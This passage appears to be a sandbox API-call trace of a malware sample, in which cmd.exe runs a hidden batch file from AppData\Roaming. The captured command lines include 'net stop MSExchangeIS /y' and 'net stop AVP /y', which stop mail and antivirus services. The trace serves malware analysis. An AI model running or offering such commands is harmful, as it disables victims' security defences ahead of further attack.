Size=0x122) returned 0x3f6d58 [0213.458] GetProcessHeap () returned 0x3e0000 [0213.458] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0213.458] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.458] GetProcessHeap () returned 0x3e0000 [0213.458] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0213.458] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0213.458] GetProcessHeap () returned 0x3e0000 [0213.458] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0213.459] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.459] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.459] GetLastError () returned 0x2 [0213.460] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.460] GetLastError () returned 0x2 [0213.460] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.461] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0213.461] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.461] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.461] GetLastError () returned 0x2 [0213.462] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0213.462] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.462] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.463] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0213.463] SetErrorMode (uMode=0x0) returned 0x1 [0213.463] GetProcessHeap () returned 0x3e0000 [0213.463] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0213.463] GetProcessHeap () returned 0x3e0000 [0213.463] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0213.463] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.463] GetProcessHeap () returned 0x3e0000 [0213.463] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0213.463] GetProcessHeap () returned 0x3e0000 [0213.463] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0213.464] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0213.464] GetProcessHeap () returned 0x3e0000 [0213.464] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0213.464] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.464] GetProcessHeap () returned 0x3e0000 [0213.464] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0213.464] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0213.464] GetProcessHeap () returned 0x3e0000 [0213.464] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0213.465] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.465] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.465] GetLastError () returned 0x2 [0213.465] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.466] GetLastError () returned 0x2 [0213.466] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.466] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0213.466] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0213.467] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.467] GetLastError () returned 0x2 [0213.467] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0213.467] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0213.468] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.468] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0213.468] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0213.468] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0213.469] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0213.469] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeIS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeIS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSExchangeIS /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x768, dwThreadId=0xa38)) returned 1 [0213.473] CloseHandle (hObject=0x74) returned 1 [0213.473] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0213.473] GetProcessHeap () returned 0x3e0000 [0213.473] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.473] GetEnvironmentStringsW () returned 0x3f8408* [0213.473] GetProcessHeap () returned 0x3e0000 [0213.473] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.473] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.473] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0213.597] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0213.598] CloseHandle (hObject=0x78) returned 1 [0213.598] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0213.598] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0213.598] GetProcessHeap () returned 0x3e0000 [0213.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.598] GetEnvironmentStringsW () returned 0x3f8408* [0213.598] GetProcessHeap () returned 0x3e0000 [0213.598] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.598] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.598] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0213.598] GetProcessHeap () returned 0x3e0000 [0213.599] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.599] GetEnvironmentStringsW () returned 0x3f8408* [0213.599] GetProcessHeap () returned 0x3e0000 [0213.599] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.599] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.599] GetProcessHeap () returned 0x3e0000 [0213.599] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0213.599] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0213.599] _get_osfhandle (_FileHandle=1) returned 0x264 [0213.599] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0213.599] _get_osfhandle (_FileHandle=1) returned 0x264 [0213.599] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0213.599] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0213.599] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0213.600] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0213.600] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0213.600] SetConsoleInputExeNameW () returned 0x1 [0213.600] GetConsoleOutputCP () returned 0x1b5 [0213.600] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0213.600] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.600] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0213.600] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0213.600] _get_osfhandle (_FileHandle=3) returned 0x78 [0213.600] SetFilePointer (in: hFile=0x78, lDistanceToMove=5360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x14f0 [0213.600] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0213.601] GetProcessHeap () returned 0x3e0000 [0213.601] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0213.601] _get_osfhandle (_FileHandle=3) returned 0x78 [0213.601] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x14f0 [0213.601] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x3d1, lpOverlapped=0x0) returned 1 [0213.601] SetFilePointer (in: hFile=0x78, lDistanceToMove=5377, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1501 [0213.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=17, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop AVP /y\r\ngeIS /y\r\nMENT /y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 17 [0213.602] _get_osfhandle (_FileHandle=3) returned 0x78 [0213.602] GetFileType (hFile=0x78) returned 0x1 [0213.602] _get_osfhandle (_FileHandle=3) returned 0x78 [0213.602] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1501 [0213.602] GetProcessHeap () returned 0x3e0000 [0213.602] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0213.602] GetProcessHeap () returned 0x3e0000 [0213.602] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0213.605] _tell (_FileHandle=3) returned 5377 [0213.605] _close (_FileHandle=3) returned 0 [0213.605] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0213.606] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0213.606] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0213.606] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0213.606] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0213.606] _wcsicmp (_String1="net", _String2="CD") returned 11 [0213.606] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0213.606] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0213.606] _wcsicmp (_String1="net", _String2="REN") returned -4 [0213.606] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0213.606] _wcsicmp (_String1="net", _String2="SET") returned -5 [0213.606] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0213.606] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0213.606] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0213.606] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0213.606] _wcsicmp (_String1="net", _String2="MD") returned 1 [0213.606] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0213.606] _wcsicmp (_String1="net", _String2="RD") returned -4 [0213.606] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0213.606] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0213.606] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0213.606] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0213.606] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0213.606] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0213.606] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0213.606] _wcsicmp (_String1="net", _String2="VER") returned -8 [0213.606] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0213.606] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0213.606] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0213.606] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0213.606] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0213.606] _wcsicmp (_String1="net", _String2="START") returned -5 [0213.606] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0213.606] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0213.606] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0213.606] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0213.606] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0213.606] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0213.606] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0213.607] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0213.607] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0213.607] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0213.607] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0213.607] SetErrorMode (uMode=0x0) returned 0x1 [0213.607] GetProcessHeap () returned 0x3e0000 [0213.607] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0213.607] GetProcessHeap () returned 0x3e0000 [0213.607] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0213.607] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.608] GetProcessHeap () returned 0x3e0000 [0213.608] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0213.608] GetProcessHeap () returned 0x3e0000 [0213.608] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0213.608] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0213.608] GetProcessHeap () returned 0x3e0000 [0213.608] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0213.608] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.608] GetProcessHeap () returned 0x3e0000 [0213.608] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0213.608] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0213.609] GetProcessHeap () returned 0x3e0000 [0213.609] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0213.609] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.609] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.609] GetLastError () returned 0x2 [0213.610] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.610] GetLastError () returned 0x2 [0213.610] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.611] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0213.611] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.611] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.611] GetLastError () returned 0x2 [0213.612] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0213.612] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.612] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.613] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0213.613] SetErrorMode (uMode=0x0) returned 0x1 [0213.613] GetProcessHeap () returned 0x3e0000 [0213.613] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0213.613] GetProcessHeap () returned 0x3e0000 [0213.613] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0213.613] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.614] GetProcessHeap () returned 0x3e0000 [0213.614] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0213.614] GetProcessHeap () returned 0x3e0000 [0213.614] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0213.614] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0213.614] GetProcessHeap () returned 0x3e0000 [0213.614] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0213.614] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.614] GetProcessHeap () returned 0x3e0000 [0213.614] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0213.614] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0213.614] GetProcessHeap () returned 0x3e0000 [0213.615] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0213.615] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.615] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.615] GetLastError () returned 0x2 [0213.616] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.616] GetLastError () returned 0x2 [0213.616] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.617] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0213.617] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.617] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.617] GetLastError () returned 0x2 [0213.618] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0213.618] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.618] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.618] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0213.619] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0213.619] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", 